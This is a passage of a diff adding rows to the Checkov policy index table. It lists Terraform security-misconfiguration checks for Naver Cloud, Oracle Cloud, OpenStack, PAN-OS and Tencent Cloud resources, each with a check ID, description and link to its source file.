+| 2013 | CKV_NCP_12      | resource | ncloud_network_acl_rule                                 | An inbound Network ACL rule should not allow ALL ports.                                                                                                                                                  | Terraform | [NACLPortCheck.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/NACLPortCheck.py)                                                                                                     |
+| 2014 | CKV_NCP_13      | resource | ncloud_lb_listener                                      | Ensure LB Listener uses only secure protocols                                                                                                                                                            | Terraform | [LBListenerUsesSecureProtocols.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/LBListenerUsesSecureProtocols.py)                                                                     |
+| 2015 | CKV_NCP_14      | resource | ncloud_nas_volume                                       | Ensure NAS is securely encrypted                                                                                                                                                                         | Terraform | [NASEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/NASEncryptionEnabled.py)                                                                                       |
+| 2016 | CKV_NCP_15      | resource | ncloud_lb_target_group                                  | Ensure Load Balancer Target Group is not using HTTP                                                                                                                                                      | Terraform | [LBTargetGroupUsingHTTPS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/LBTargetGroupUsingHTTPS.py)                                                                                 |
+| 2017 | CKV_NCP_16      | resource | ncloud_lb                                               | Ensure Load Balancer isn't exposed to the internet                                                                                                                                                       | Terraform | [LBNetworkPrivate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/LBNetworkPrivate.py)                                                                                               |
+| 2018 | CKV_NCP_18      | resource | ncloud_auto_scaling_group                               | Ensure that auto Scaling groups that are associated with a load balancer, are using Load Balancing health checks.                                                                                        | Terraform | [AutoScalingEnabledLB.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ncp/AutoScalingEnabledLB.yaml)                                                                               |
+| 2019 | CKV_NCP_18      | resource | ncloud_lb_target_group                                  | Ensure that auto Scaling groups that are associated with a load balancer, are using Load Balancing health checks.                                                                                        | Terraform | [AutoScalingEnabledLB.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ncp/AutoScalingEnabledLB.yaml)                                                                               |
+| 2020 | CKV_NCP_19      | resource | ncloud_nks_cluster                                      | Ensure Naver Kubernetes Service public endpoint disabled                                                                                                                                                 | Terraform | [NKSPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/NKSPublicAccess.py)                                                                                                 |
+| 2021 | CKV_NCP_20      | resource | ncloud_route                                            | Ensure Routing Table associated with Web tier subnet have the default route (0.0.0.0/0) defined to allow connectivity                                                                                    | Terraform | [RouteTableNATGatewayDefault.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/RouteTableNATGatewayDefault.py)                                                                         |
+| 2022 | CKV_NCP_22      | resource | ncloud_nks_cluster                                      | Ensure NKS control plane logging enabled for all log types                                                                                                                                               | Terraform | [NKSControlPlaneLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/NKSControlPlaneLogging.py)                                                                                   |
+| 2023 | CKV_NCP_22      | resource | ncloud_route_table                                      | Ensure a route table for the public subnets is created.                                                                                                                                                  | Terraform | [RouteTablePublicSubnetConnection.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ncp/RouteTablePublicSubnetConnection.yaml)                                                       |
+| 2024 | CKV_NCP_22      | resource | ncloud_subnet                                           | Ensure a route table for the public subnets is created.                                                                                                                                                  | Terraform | [RouteTablePublicSubnetConnection.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ncp/RouteTablePublicSubnetConnection.yaml)                                                       |
+| 2025 | CKV_NCP_23      | resource | ncloud_public_ip                                        | Ensure Server instance should not have public IP.                                                                                                                                                        | Terraform | [ServerPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/ServerPublicIP.py)                                                                                                   |
+| 2026 | CKV_NCP_24      | resource | ncloud_lb_listener                                      | Ensure Load Balancer Listener Using HTTPS                                                                                                                                                                | Terraform | [LBListenerUsingHTTPS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/LBListenerUsingHTTPS.py)                                                                                       |
+| 2027 | CKV_NCP_25      | resource | ncloud_access_control_group_rule                        | Ensure no access control groups allow inbound from 0.0.0.0:0 to port 80                                                                                                                                  | Terraform | [AccessControlGroupInboundRulePort80.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/AccessControlGroupInboundRulePort80.py)                                                         |
+| 2028 | CKV_NCP_26      | resource | ncloud_access_control_group                             | Ensure Access Control Group has Access Control Group Rule attached                                                                                                                                       | Terraform | [AccessControlGroupRuleDefine.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ncp/AccessControlGroupRuleDefine.yaml)                                                               |
+| 2029 | CKV_OCI_1       | provider | oci                                                     | Ensure no hard coded OCI private key in provider                                                                                                                                                         | Terraform | [credentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/provider/oci/credentials.py)                                                                                                         |
+| 2030 | CKV_OCI_2       | resource | oci_core_volume                                         | Ensure OCI Block Storage Block Volume has backup enabled                                                                                                                                                 | Terraform | [StorageBlockBackupEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/StorageBlockBackupEnabled.py)                                                                             |
+| 2031 | CKV_OCI_3       | resource | oci_core_volume                                         | OCI Block Storage Block Volumes are not encrypted with a Customer Managed Key (CMK)                                                                                                                      | Terraform | [StorageBlockEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/StorageBlockEncryption.py)                                                                                   |
+| 2032 | CKV_OCI_4       | resource | oci_core_instance                                       | Ensure OCI Compute Instance boot volume has in-transit data encryption enabled                                                                                                                           | Terraform | [InstanceBootVolumeIntransitEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/InstanceBootVolumeIntransitEncryption.py)                                                     |
+| 2033 | CKV_OCI_5       | resource | oci_core_instance                                       | Ensure OCI Compute Instance has Legacy MetaData service endpoint disabled                                                                                                                                | Terraform | [InstanceMetadataServiceEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/InstanceMetadataServiceEnabled.py)                                                                   |
+| 2034 | CKV_OCI_6       | resource | oci_core_instance                                       | Ensure OCI Compute Instance has monitoring enabled                                                                                                                                                       | Terraform | [InstanceMonitoringEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/InstanceMonitoringEnabled.py)                                                                             |
+| 2035 | CKV_OCI_7       | resource | oci_objectstorage_bucket                                | Ensure OCI Object Storage bucket can emit object events                                                                                                                                                  | Terraform | [ObjectStorageEmitEvents.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/ObjectStorageEmitEvents.py)                                                                                 |
+| 2036 | CKV_OCI_8       | resource | oci_objectstorage_bucket                                | Ensure OCI Object Storage has versioning enabled                                                                                                                                                         | Terraform | [ObjectStorageVersioning.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/ObjectStorageVersioning.py)                                                                                 |
+| 2037 | CKV_OCI_9       | resource | oci_objectstorage_bucket                                | Ensure OCI Object Storage is encrypted with Customer Managed Key                                                                                                                                         | Terraform | [ObjectStorageEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/ObjectStorageEncryption.py)                                                                                 |
+| 2038 | CKV_OCI_10      | resource | oci_objectstorage_bucket                                | Ensure OCI Object Storage is not Public                                                                                                                                                                  | Terraform | [ObjectStoragePublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/ObjectStoragePublic.py)                                                                                         |
+| 2039 | CKV_OCI_11      | resource | oci_identity_authentication_policy                      | OCI IAM password policy - must contain lower case                                                                                                                                                        | Terraform | [IAMPasswordPolicyLowerCase.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/IAMPasswordPolicyLowerCase.py)                                                                           |
+| 2040 | CKV_OCI_12      | resource | oci_identity_authentication_policy                      | OCI IAM password policy - must contain Numeric characters                                                                                                                                                | Terraform | [IAMPasswordPolicyNumeric.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/IAMPasswordPolicyNumeric.py)                                                                               |
+| 2041 | CKV_OCI_13      | resource | oci_identity_authentication_policy                      | OCI IAM password policy - must contain Special characters                                                                                                                                                | Terraform | [IAMPasswordPolicySpecialCharacters.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/IAMPasswordPolicySpecialCharacters.py)                                                           |
+| 2042 | CKV_OCI_14      | resource | oci_identity_authentication_policy                      | OCI IAM password policy - must contain Uppercase characters                                                                                                                                              | Terraform | [IAMPasswordPolicyUpperCase.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/IAMPasswordPolicyUpperCase.py)                                                                           |
+| 2043 | CKV_OCI_15      | resource | oci_file_storage_file_system                            | Ensure OCI File System is Encrypted with a customer Managed Key                                                                                                                                          | Terraform | [FileSystemEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/FileSystemEncryption.py)                                                                                       |
+| 2044 | CKV_OCI_16      | resource | oci_core_security_list                                  | Ensure VCN has an inbound security list                                                                                                                                                                  | Terraform | [SecurityListIngress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/SecurityListIngress.py)                                                                                         |
+| 2045 | CKV_OCI_17      | resource | oci_core_security_list                                  | Ensure VCN inbound security lists are stateless                                                                                                                                                          | Terraform | [SecurityListIngressStateless.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/SecurityListIngressStateless.py)                                                                       |
+| 2046 | CKV_OCI_18      | resource | oci_identity_authentication_policy                      | OCI IAM password policy for local (non-federated) users has a minimum length of 14 characters                                                                                                            | Terraform | [IAMPasswordLength.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/IAMPasswordLength.py)                                                                                             |
+| 2047 | CKV_OCI_19      | resource | oci_core_security_list                                  | Ensure no security list allow ingress from 0.0.0.0:0 to port 22.                                                                                                                                         | Terraform | [SecurityListUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/SecurityListUnrestrictedIngress22.py)                                                             |
+| 2048 | CKV_OCI_20      | resource | oci_core_security_list                                  | Ensure no security list allow ingress from 0.0.0.0:0 to port 3389.                                                                                                                                       | Terraform | [SecurityListUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/SecurityListUnrestrictedIngress3389.py)                                                         |
+| 2049 | CKV_OCI_21      | resource | oci_core_network_security_group_security_rule           | Ensure security group has stateless ingress security rules                                                                                                                                               | Terraform | [SecurityGroupsIngressStatelessSecurityRules.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/SecurityGroupsIngressStatelessSecurityRules.py)                                         |
+| 2050 | CKV_OCI_22      | resource | oci_core_network_security_group_security_rule           | Ensure no security groups rules allow ingress from 0.0.0.0/0 to port 22                                                                                                                                  | Terraform | [AbsSecurityGroupUnrestrictedIngress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/AbsSecurityGroupUnrestrictedIngress.py)                                                         |
+| 2051 | CKV2_OCI_1      | resource | oci_identity_group                                      | Ensure administrator users are not associated with API keys                                                                                                                                              | Terraform | [AdministratorUserNotAssociatedWithAPIKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/oci/AdministratorUserNotAssociatedWithAPIKey.yaml)                                       |
+| 2052 | CKV2_OCI_1      | resource | oci_identity_user                                       | Ensure administrator users are not associated with API keys                                                                                                                                              | Terraform | [AdministratorUserNotAssociatedWithAPIKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/oci/AdministratorUserNotAssociatedWithAPIKey.yaml)                                       |
+| 2053 | CKV2_OCI_1      | resource | oci_identity_user_group_membership                      | Ensure administrator users are not associated with API keys                                                                                                                                              | Terraform | [AdministratorUserNotAssociatedWithAPIKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/oci/AdministratorUserNotAssociatedWithAPIKey.yaml)                                       |
+| 2054 | CKV2_OCI_2      | resource | oci_core_network_security_group_security_rule           | Ensure NSG does not allow all traffic on RDP port (3389)                                                                                                                                                 | Terraform | [OCI_NSGNotAllowRDP.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/oci/OCI_NSGNotAllowRDP.yaml)                                                                                   |
+| 2055 | CKV2_OCI_3      | resource | oci_containerengine_cluster                             | Ensure Kubernetes engine cluster is configured with NSG(s)                                                                                                                                               | Terraform | [OCI_KubernetesEngineClusterEndpointConfigWithNSG.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/oci/OCI_KubernetesEngineClusterEndpointConfigWithNSG.yaml)                       |
+| 2056 | CKV2_OCI_4      | resource | oci_file_storage_export                                 | Ensure File Storage File System access is restricted to root users                                                                                                                                       | Terraform | [OCI_NFSaccessRestrictedToRootUsers.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/oci/OCI_NFSaccessRestrictedToRootUsers.yaml)                                                   |
+| 2057 | CKV2_OCI_5      | resource | oci_containerengine_node_pool                           | Ensure Kubernetes Engine Cluster boot volume is configured with in-transit data encryption                                                                                                               | Terraform | [OCI_K8EngineClusterBootVolConfigInTransitEncryption.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/oci/OCI_K8EngineClusterBootVolConfigInTransitEncryption.yaml)                 |
+| 2058 | CKV2_OCI_6      | resource | oci_containerengine_cluster                             | Ensure Kubernetes Engine Cluster pod security policy is enforced                                                                                                                                         | Terraform | [OCI_K8EngineClusterPodSecPolicyEnforced.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/oci/OCI_K8EngineClusterPodSecPolicyEnforced.yaml)                                         |
+| 2059 | CKV_OPENSTACK_1 | provider | openstack                                               | Ensure no hard coded OpenStack password, token, or application_credential_secret exists in provider                                                                                                      | Terraform | [credentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/provider/openstack/credentials.py)                                                                                                   |
+| 2060 | CKV_OPENSTACK_2 | resource | openstack_compute_secgroup_v2                           | Ensure no security groups allow ingress from 0.0.0.0:0 to port 22 (tcp / udp)                                                                                                                            | Terraform | [SecurityGroupUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/openstack/SecurityGroupUnrestrictedIngress22.py)                                                     |
+| 2061 | CKV_OPENSTACK_2 | resource | openstack_networking_secgroup_rule_v2                   | Ensure no security groups allow ingress from 0.0.0.0:0 to port 22 (tcp / udp)                                                                                                                            | Terraform | [SecurityGroupUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/openstack/SecurityGroupUnrestrictedIngress22.py)                                                     |
+| 2062 | CKV_OPENSTACK_3 | resource | openstack_compute_secgroup_v2                           | Ensure no security groups allow ingress from 0.0.0.0:0 to port 3389 (tcp / udp)                                                                                                                          | Terraform | [SecurityGroupUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/openstack/SecurityGroupUnrestrictedIngress3389.py)                                                 |
+| 2063 | CKV_OPENSTACK_3 | resource | openstack_networking_secgroup_rule_v2                   | Ensure no security groups allow ingress from 0.0.0.0:0 to port 3389 (tcp / udp)                                                                                                                          | Terraform | [SecurityGroupUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/openstack/SecurityGroupUnrestrictedIngress3389.py)                                                 |
+| 2064 | CKV_OPENSTACK_4 | resource | openstack_compute_instance_v2                           | Ensure that instance does not use basic credentials                                                                                                                                                      | Terraform | [ComputeInstanceAdminPassword.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/openstack/ComputeInstanceAdminPassword.py)                                                                 |
+| 2065 | CKV_OPENSTACK_5 | resource | openstack_fw_rule_v1                                    | Ensure firewall rule set a destination IP                                                                                                                                                                | Terraform | [FirewallRuleSetDestinationIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/openstack/FirewallRuleSetDestinationIP.py)                                                                 |
+| 2066 | CKV_PAN_1       | provider | panos                                                   | Ensure no hard coded PAN-OS credentials exist in provider                                                                                                                                                | Terraform | [credentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/provider/panos/credentials.py)                                                                                                       |
+| 2067 | CKV_PAN_2       | resource | panos_management_profile                                | Ensure plain-text management HTTP is not enabled for an Interface Management Profile                                                                                                                     | Terraform | [InterfaceMgmtProfileNoHTTP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/InterfaceMgmtProfileNoHTTP.py)                                                                         |
+| 2068 | CKV_PAN_3       | resource | panos_management_profile                                | Ensure plain-text management Telnet is not enabled for an Interface Management Profile                                                                                                                   | Terraform | [InterfaceMgmtProfileNoTelnet.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/InterfaceMgmtProfileNoTelnet.py)                                                                     |
+| 2069 | CKV_PAN_4       | resource | panos_security_policy                                   | Ensure DSRI is not enabled within security policies                                                                                                                                                      | Terraform | [PolicyNoDSRI.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyNoDSRI.py)                                                                                                     |
+| 2070 | CKV_PAN_4       | resource | panos_security_rule_group                               | Ensure DSRI is not enabled within security policies                                                                                                                                                      | Terraform | [PolicyNoDSRI.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyNoDSRI.py)                                                                                                     |
+| 2071 | CKV_PAN_5       | resource | panos_security_policy                                   | Ensure security rules do not have 'applications' set to 'any'                                                                                                                                            | Terraform | [PolicyNoApplicationAny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyNoApplicationAny.py)                                                                                 |
+| 2072 | CKV_PAN_5       | resource | panos_security_rule_group                               | Ensure security rules do not have 'applications' set to 'any'                                                                                                                                            | Terraform | [PolicyNoApplicationAny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyNoApplicationAny.py)                                                                                 |
+| 2073 | CKV_PAN_6       | resource | panos_security_policy                                   | Ensure security rules do not have 'services' set to 'any'                                                                                                                                                | Terraform | [PolicyNoServiceAny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyNoServiceAny.py)                                                                                         |
+| 2074 | CKV_PAN_6       | resource | panos_security_rule_group                               | Ensure security rules do not have 'services' set to 'any'                                                                                                                                                | Terraform | [PolicyNoServiceAny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyNoServiceAny.py)                                                                                         |
+| 2075 | CKV_PAN_7       | resource | panos_security_policy                                   | Ensure security rules do not have 'source_addresses' and 'destination_addresses' both containing values of 'any'                                                                                         | Terraform | [PolicyNoSrcAnyDstAny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyNoSrcAnyDstAny.py)                                                                                     |
+| 2076 | CKV_PAN_7       | resource | panos_security_rule_group                               | Ensure security rules do not have 'source_addresses' and 'destination_addresses' both containing values of 'any'                                                                                         | Terraform | [PolicyNoSrcAnyDstAny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyNoSrcAnyDstAny.py)                                                                                     |
+| 2077 | CKV_PAN_8       | resource | panos_security_policy                                   | Ensure description is populated within security policies                                                                                                                                                 | Terraform | [PolicyDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyDescription.py)                                                                                           |
+| 2078 | CKV_PAN_8       | resource | panos_security_rule_group                               | Ensure description is populated within security policies                                                                                                                                                 | Terraform | [PolicyDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyDescription.py)                                                                                           |
+| 2079 | CKV_PAN_9       | resource | panos_security_policy                                   | Ensure a Log Forwarding Profile is selected for each security policy rule                                                                                                                                | Terraform | [PolicyLogForwarding.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyLogForwarding.py)                                                                                       |
+| 2080 | CKV_PAN_9       | resource | panos_security_rule_group                               | Ensure a Log Forwarding Profile is selected for each security policy rule                                                                                                                                | Terraform | [PolicyLogForwarding.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyLogForwarding.py)                                                                                       |
+| 2081 | CKV_PAN_10      | resource | panos_security_policy                                   | Ensure logging at session end is enabled within security policies                                                                                                                                        | Terraform | [PolicyLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyLoggingEnabled.py)                                                                                     |
+| 2082 | CKV_PAN_10      | resource | panos_security_rule_group                               | Ensure logging at session end is enabled within security policies                                                                                                                                        | Terraform | [PolicyLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyLoggingEnabled.py)                                                                                     |
+| 2083 | CKV_PAN_11      | resource | panos_ipsec_crypto_profile                              | Ensure IPsec profiles do not specify use of insecure encryption algorithms                                                                                                                               | Terraform | [NetworkIPsecAlgorithms.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/NetworkIPsecAlgorithms.py)                                                                                 |
+| 2084 | CKV_PAN_11      | resource | panos_panorama_ipsec_crypto_profile                     | Ensure IPsec profiles do not specify use of insecure encryption algorithms                                                                                                                               | Terraform | [NetworkIPsecAlgorithms.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/NetworkIPsecAlgorithms.py)                                                                                 |
+| 2085 | CKV_PAN_12      | resource | panos_ipsec_crypto_profile                              | Ensure IPsec profiles do not specify use of insecure authentication algorithms                                                                                                                           | Terraform | [NetworkIPsecAuthAlgorithms.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/NetworkIPsecAuthAlgorithms.py)                                                                         |
+| 2086 | CKV_PAN_12      | resource | panos_panorama_ipsec_crypto_profile                     | Ensure IPsec profiles do not specify use of insecure authentication algorithms                                                                                                                           | Terraform | [NetworkIPsecAuthAlgorithms.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/NetworkIPsecAuthAlgorithms.py)                                                                         |
+| 2087 | CKV_PAN_13      | resource | panos_ipsec_crypto_profile                              | Ensure IPsec profiles do not specify use of insecure protocols                                                                                                                                           | Terraform | [NetworkIPsecProtocols.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/NetworkIPsecProtocols.py)                                                                                   |
+| 2088 | CKV_PAN_13      | resource | panos_panorama_ipsec_crypto_profile                     | Ensure IPsec profiles do not specify use of insecure protocols                                                                                                                                           | Terraform | [NetworkIPsecProtocols.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/NetworkIPsecProtocols.py)                                                                                   |
+| 2089 | CKV_PAN_14      | resource | panos_panorama_zone                                     | Ensure a Zone Protection Profile is defined within Security Zones                                                                                                                                        | Terraform | [ZoneProtectionProfile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/ZoneProtectionProfile.py)                                                                                   |
+| 2090 | CKV_PAN_14      | resource | panos_zone                                              | Ensure a Zone Protection Profile is defined within Security Zones                                                                                                                                        | Terraform | [ZoneProtectionProfile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/ZoneProtectionProfile.py)                                                                                   |
+| 2091 | CKV_PAN_14      | resource | panos_zone_entry                                        | Ensure a Zone Protection Profile is defined within Security Zones                                                                                                                                        | Terraform | [ZoneProtectionProfile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/ZoneProtectionProfile.py)                                                                                   |
+| 2092 | CKV_PAN_15      | resource | panos_panorama_zone                                     | Ensure an Include ACL is defined for a Zone when User-ID is enabled                                                                                                                                      | Terraform | [ZoneUserIDIncludeACL.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/ZoneUserIDIncludeACL.py)                                                                                     |
+| 2093 | CKV_PAN_15      | resource | panos_zone                                              | Ensure an Include ACL is defined for a Zone when User-ID is enabled                                                                                                                                      | Terraform | [ZoneUserIDIncludeACL.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/ZoneUserIDIncludeACL.py)                                                                                     |
+| 2094 | CKV_TC_1        | resource | tencentcloud_cbs_storage                                | Ensure Tencent Cloud CBS is encrypted                                                                                                                                                                    | Terraform | [CBSEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/tencentcloud/CBSEncryption.py)                                                                                            |
+| 2095 | CKV_TC_2        | resource | tencentcloud_instance                                   | Ensure Tencent Cloud CVM instance does not allocate a public IP                                                                                                                                          | Terraform | [CVMAllocatePublicIp.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/tencentcloud/CVMAllocatePublicIp.py)                                                                                |
+| 2096 | CKV_TC_3        | resource | tencentcloud_instance                                   | Ensure Tencent Cloud CVM monitor service is enabled                                                                                                                                                      | Terraform | [CVMDisableMonitorService.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/tencentcloud/CVMDisableMonitorService.py)                                                                      |
+| 2097 | CKV_TC_4        | resource | tencentcloud_instance                                   | Ensure Tencent Cloud CVM instances do not use the default security group                                                                                                                                 | Terraform | [CVMUseDefaultSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/tencentcloud/CVMUseDefaultSecurityGroup.py)                                                                  |
+| 2098 | CKV_TC_5        | resource | tencentcloud_instance                                   | Ensure Tencent Cloud CVM instances do not use the default VPC                                                                                                                                            | Terraform | [CVMUseDefaultVPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/tencentcloud/CVMUseDefaultVPC.py)                                                                                      |
+| 2099 | CKV_TC_6        | resource | tencentcloud_kubernetes_cluster                         | Ensure Tencent Cloud TKE clusters enable log agent                                                                                                                                                       | Terraform | [TKELogAgentEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/tencentcloud/TKELogAgentEnabled.py)                                                                                  |
+| 2100 | CKV_TC_7        | resource | tencentcloud_kubernetes_cluster                         | Ensure Tencent Cloud TKE cluster is not assigned a public IP address                                                                                                                                     | Terraform | [TKEPublicIpAssigned.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/tencentcloud/TKEPublicIpAssigned.py)                                                                                |
+| 2101 | CKV_TC_8        | resource | tencentcloud_security_group_rule_set                    | Ensure Tencent Cloud VPC security group rules do not accept all traffic                                                                                                                                  | Terraform | [VPCSecurityGroupRuleSet.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/tencentcloud/VPCSecurityGroupRuleSet.py)                                                                        |
+| 2102 | CKV_TC_9        | resource | tencentcloud_mysql_instance                             | Ensure Tencent Cloud mysql instances do not enable access from public networks                                                                                                                           | Terraform | [CDBInternetService.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/tencentcloud/CDBInternetService.py)                                                                                  |
+| 2103 | CKV_TC_10       | resource | tencentcloud_mysql_instance                             | Ensure Tencent Cloud MySQL instances intranet ports are not set to the default 3306                                                                                                                      | Terraform | [CDBIntranetPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/tencentcloud/CDBIntranetPort.py)                                                                                        |
+| 2104 | CKV_TC_11       | resource | tencentcloud_clb_instance                               | Ensure Tencent Cloud CLB has a logging ID and topic                                                                                                                                                      | Terraform | [CLBInstanceLog.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/tencentcloud/CLBInstanceLog.py)                                                                                          |
+| 2105 | CKV_TC_12       | resource | tencentcloud_clb_listener                               | Ensure Tencent Cloud CLBs use modern, encrypted protocols                                                                                                                                                | Terraform | [CLBListenerProtocol.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/tencentcloud/CLBListenerProtocol.py)                                                                                |
+| 2106 | CKV_TC_13       | resource | tencentcloud_instance                                   | Ensure Tencent Cloud CVM user data does not contain sensitive information                                                                                                                                | Terraform | [CVMUserData.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/tencentcloud/CVMUserData.py)                                                                                                |
+| 2107 | CKV_TC_14       | resource | tencentcloud_vpc_flow_log_config                        | Ensure Tencent Cloud VPC flow logs are enabled                                                                                                                                                           | Terraform | [VPCFlowLogConfigEnable.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/tencentcloud/VPCFlowLogConfigEnable.py)                                                                          |
